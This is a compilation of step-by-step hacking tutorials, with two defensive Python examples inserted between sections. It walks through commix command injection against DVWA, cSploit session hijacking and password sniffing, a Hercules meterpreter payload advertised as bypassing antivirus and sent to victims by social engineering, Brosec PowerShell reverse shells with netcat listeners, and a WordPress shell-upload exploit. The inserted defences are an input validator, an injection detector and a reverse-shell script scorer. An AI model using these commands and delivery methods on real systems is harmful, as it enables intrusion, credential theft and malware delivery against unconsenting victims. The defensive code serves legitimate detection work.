Exploiting OS Command Injection in Web Application using Commix

Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos that can be used by web developers, penetration testers or security researchers to test web-based applications with the aim of finding bugs, errors or vulnerabilities related to command injection attacks. With this tool it is very easy to find and exploit a command injection vulnerability in a given vulnerable parameter or HTTP header.

First of all, install the Tamper Data add-on in Firefox; it is used for modifying HTTP requests. We will be using DVWA for testing purposes. DVWA is installed on the target machine with IP 192.168.0.105.


Log into DVWA, set the security level to low and open the Command Injection tab.


Now open Tamper Data, click Start Tamper, enter any IP address and submit the form. Tamper Data will pop up asking whether to tamper with the request; click Submit on all of the pop-ups.


Now open Tamper Data, find the cookie value in the GET request and copy it.


Also copy the POST string from the POST request.


Now open a terminal on Kali Linux and type the following command:

commix  --url="http://192.168.0.105/dvwa/vulnerabilities/exec/#" --cookie="security=low; PHPSESSID=nh5ehntedbu7ha97lpm8o8vjm2" --data="ip=192.168.0.105&Submit=Submit"

In the URL field, paste the target URL.

In the cookie field, paste the cookie value you copied; in the data field, paste the POST string you copied and put the IP of the target machine in the ip field of the POST string.

After the command executes you will get an os-shell on the target machine and can run any Windows command, as my target machine was Windows.
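The DVWA page exploited above passes the submitted ip value straight into a shell command, which is exactly what commix abuses. The following is an added example, not part of the original article or of DVWA or commix, that puts the vulnerable pattern next to a hardened handler and a detection hook. Assumptions: a Linux-style ping invocation, a Python web handler rather than DVWA's PHP, and constructed sample inputs modelled on the ip parameter from the commix command above.

```python
import ipaddress
import re
import subprocess

# Constructed sample inputs: one legitimate target and three injection attempts of the kind
# commix sends against the DVWA "ip" parameter.
SAMPLE_INPUTS = [
    "192.168.0.105",
    "192.168.0.105; cat /etc/passwd",
    "192.168.0.105 && whoami",
    "$(id)",
]

# Shell metacharacters an injection payload needs once input is spliced into a command string.
SHELL_META = re.compile(r"[;&|`$<>\n\r(){}]")


def vulnerable_command(ip: str) -> str:
    """The DVWA-style pattern: user input concatenated into a shell command string.
    Returned rather than executed so the problem is visible: a ';' in the input starts a
    second command that the shell runs with the web server's privileges."""
    return "ping -c 4 " + ip


def is_valid_target(ip: str) -> bool:
    """Allow-list check: accept only a syntactically valid IPv4/IPv6 literal, nothing else."""
    try:
        ipaddress.ip_address(ip)
        return True
    except ValueError:
        return False


def build_ping_argv(ip: str) -> list[str]:
    """Hardened form: validate first, then build an argv list so no shell ever parses the input.
    The '-c 4' flag is the Linux iputils form (assumption); Windows ping uses '-n'."""
    if not is_valid_target(ip):
        raise ValueError(f"rejected ping target: {ip!r}")
    return ["ping", "-c", "4", ip]


def run_ping(ip: str) -> subprocess.CompletedProcess:
    """Execute the validated command without shell=True; the input is a single argv element."""
    return subprocess.run(build_ping_argv(ip), capture_output=True, text=True,
                          timeout=10, check=False)


def looks_injected(value: str) -> bool:
    """Detection hook for a WAF rule or request log: flag shell metacharacters in a parameter."""
    return bool(SHELL_META.search(value))


def triage(values):
    """Return (value, accepted_by_validator, flagged_by_detector) for each submitted value."""
    return [(v, is_valid_target(v), looks_injected(v)) for v in values]


if __name__ == "__main__":
    for value, accepted, flagged in triage(SAMPLE_INPUTS):
        print(f"{value!r:40} accepted={accepted} flagged={flagged}")
        print("  naive command string would be:", vulnerable_command(value))
```

The validator and the detector serve different purposes: `is_valid_target` is the fix (reject anything that is not an address, and never hand the value to a shell), while `looks_injected` is what you would log or alert on to notice a scanner like commix probing the parameter.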

Hack your Network through Android Phone using cSploit

First download cSploit from here and install it on your Android phone.

Now open cSploit, select your network and then select the target IP you want to attack.


Now select MITM option, see the picture below:


Session Hijacker

Now choose the Session Hijacker option (it is used to capture the victim's browser activity).


Now click the Start button to begin session hijacking.


Now you will see the result. In my case the victim has opened 3 tabs in his browser.


Now, if you want to open any particular session, click on its link; it will automatically start the session hijacking. (An example is given below.)



Password Sniffer
For this option choose the Password Sniffer tab.
Note: it captures only passwords sent over plain HTTP; credentials submitted over HTTPS are not readable.


Here you can see the result.


Kill Connections
Now choose the Kill Connections option. It will cut the internet connection of the chosen PC on the network.


Redirect
Now choose Redirect option


Now you will see a prompt; enter the website address to which you want to redirect the victim's traffic. (This works only for HTTP websites.)


Replace images
For the next option choose Replace Images (it is used to change the images on the victim's current tab).


Now choose the image you want to display in the victim's browser.




Script Injection

Now choose the Script Injection option (it will show a fake message in the victim's browser).


Now choose the Local File option.


Bypass All Antivirus and Hack Remote Windows 10 PC using Hercules

HERCULES is a payload generator advertised as able to bypass all antivirus software.

First clone the Hercules repository from GitHub; to do so type:




Now open a Kali Linux terminal in the directory to which you downloaded Hercules and type the following command:

./HERCULES_x64 192.168.0.105 4444 -p windows/meterpreter/reverse_tcp -a 64 -l dynamic


It will save a file named payload.exe. Now send the exe file to the victim using any social engineering technique.


Now open a Kali Linux terminal and type the following netcat command. With -l it starts a TCP listener on the specified port and waits for the payload on the target to connect back to it.

nc -l -p 4444

Hack Remote PC with Reverse PowerShell using Brosec

Brosec is a terminal based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate on the fly reverse shells (python, perl, powershell, etc) that get copied to the clipboard.

Firstly install the Brosec tool on your Kali Linux. Follow the steps below one by one.
Reference:

https://github.com/gabemarshall/Brosec

- apt-get install npm build-essential g++ xsel netcat (install dependencies)
- npm config set registry http://registry.npmjs.org/ (the npm registry seems to be broken by default when installed from the Kali repos)
- npm install -g n (install n, the Node.js version manager)
- n latest (install the latest version of Node.js)
- git clone https://github.com/gabemarshall/Brosec.git (clone the Brosec repo)
- cd Brosec && npm install (cd into the directory and install the npm dependencies)


After that start Brosec by typing in terminal:
./bros
It will show you menu options.


Now set the IP of your local host (lhost):
set lhost 192.168.0.111
Now set the local port (lport):
set lport 4444


After setting the localhost and lport, choose option 5 Miscellaneous.

You will see 2 options, Reverse Shells and Exfiltration. Now select option 1 Reverse Shells, see the image below:


After choosing the option Reverse Shells, you will see 5 options. In my case I'm selecting option 4 Reverse Shell PSH


Now it will show you the message "Should I start a netcat listener for you?"

Press Y to start the netcat listener. It will generate a PowerShell script, see the picture below.

Copy this code into a text editor and save it with a .ps1 (PowerShell) extension.



Now send the saved .ps1 file to the victim using any social engineering method. When the victim clicks on it, you will get a session on the victim's PC. See the picture below for reference.


Now you can use the systeminfo command to get information about the victim's PC.
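The Brosec section above ends with a .ps1 reverse shell delivered by social engineering, and the Hercules section before it with a netcat listener waiting on port 4444. Both land on the same defensive question: what does a PowerShell reverse shell look like to something scanning scripts before they run (a mail gateway, an EDR script-block hook, or a simple triage job)? The following is an added example, not part of the article, of Brosec or of Hercules, that scores a script on the API calls a TCP reverse shell written in PowerShell cannot avoid. The suspicious sample is a constructed fragment with the command loop elided, not a working shell, and the indicator weights and threshold are assumptions chosen for illustration.

```python
import re

# Constructed fragment: the socket-setup and evaluation lines a PowerShell TCP reverse shell
# needs; the read/execute loop is deliberately elided, so this is not a runnable shell.
SUSPECT_SCRIPT = """\
$client = New-Object System.Net.Sockets.TCPClient("192.168.0.111", 4444)
$stream = $client.GetStream()
# ... read commands from the socket, run them, write output back ...
iex $data 2>&1 | Out-String
"""

# Constructed benign script for contrast: routine log housekeeping.
BENIGN_SCRIPT = """\
Get-ChildItem C:\\Logs -Filter *.log | Where-Object LastWriteTime -lt (Get-Date).AddDays(-30) | Remove-Item
Write-Host "Old logs cleaned"
"""

# (pattern, weight, description). Weights are an assumption for illustration: a raw TCP
# client plus dynamic evaluation is the core of the technique, a literal IP:port pair alone
# is weak evidence (plenty of admin scripts contain one).
INDICATORS = [
    (re.compile(r"System\.Net\.Sockets\.TCPClient", re.I), 3, "raw TCP client"),
    (re.compile(r"\.GetStream\(\)", re.I), 2, "socket stream"),
    (re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 2, "dynamic code execution"),
    (re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b[\"']?\s*,\s*\d{2,5}\b"), 1, "literal IP:port pair"),
]
THRESHOLD = 5


def score_script(text: str):
    """Return (score, descriptions of matched indicators) for one script's text."""
    score, hits = 0, []
    for pattern, weight, desc in INDICATORS:
        if pattern.search(text):
            score += weight
            hits.append(desc)
    return score, hits


def is_reverse_shell_candidate(text: str) -> bool:
    """True when enough independent indicators co-occur to justify quarantine and review."""
    return score_script(text)[0] >= THRESHOLD


if __name__ == "__main__":
    for name, text in (("suspect", SUSPECT_SCRIPT), ("benign", BENIGN_SCRIPT)):
        score, hits = score_script(text)
        verdict = "REVIEW" if is_reverse_shell_candidate(text) else "ok"
        print(f"{name}: score={score} {verdict} {hits}")
```

Static scoring like this is cheap and catches the unobfuscated output of tools such as Brosec, but it is a first filter, not a control: the durable mitigations against the delivery step described above are blocking .ps1 attachments at the mail gateway, keeping Windows' default of not running .ps1 files on double-click, enabling PowerShell script block logging, and egress filtering so that a workstation cannot open an arbitrary outbound TCP connection to port 4444 in the first place.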

Penetration Testing in Wordpress Website using Wordpress Exploit Framework

A Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems

First clone the WPXF repository from GitHub; to do so type:

git clone https://github.com/rastating/wordpress-exploit-framework.git


Now open a Kali Linux terminal in the directory to which you downloaded WordPress Exploit Framework, and start it by running ruby wpxf.rb.


Once loaded, you'll be presented with the wpxf prompt, from here you can search for modules using the search command or load a module using the use command.

wpxf > use exploit/reflex_gallery_shell_upload

wpxf [exploit/reflex_gallery_shell_upload] > set host 192.168.0.104

wpxf [exploit/reflex_gallery_shell_upload] > set target_uri /

wpxf [exploit/reflex_gallery_shell_upload] > set payload reverse_tcp

wpxf [exploit/reflex_gallery_shell_upload] > set lhost 192.168.0.105

wpxf [exploit/reflex_gallery_shell_upload] > run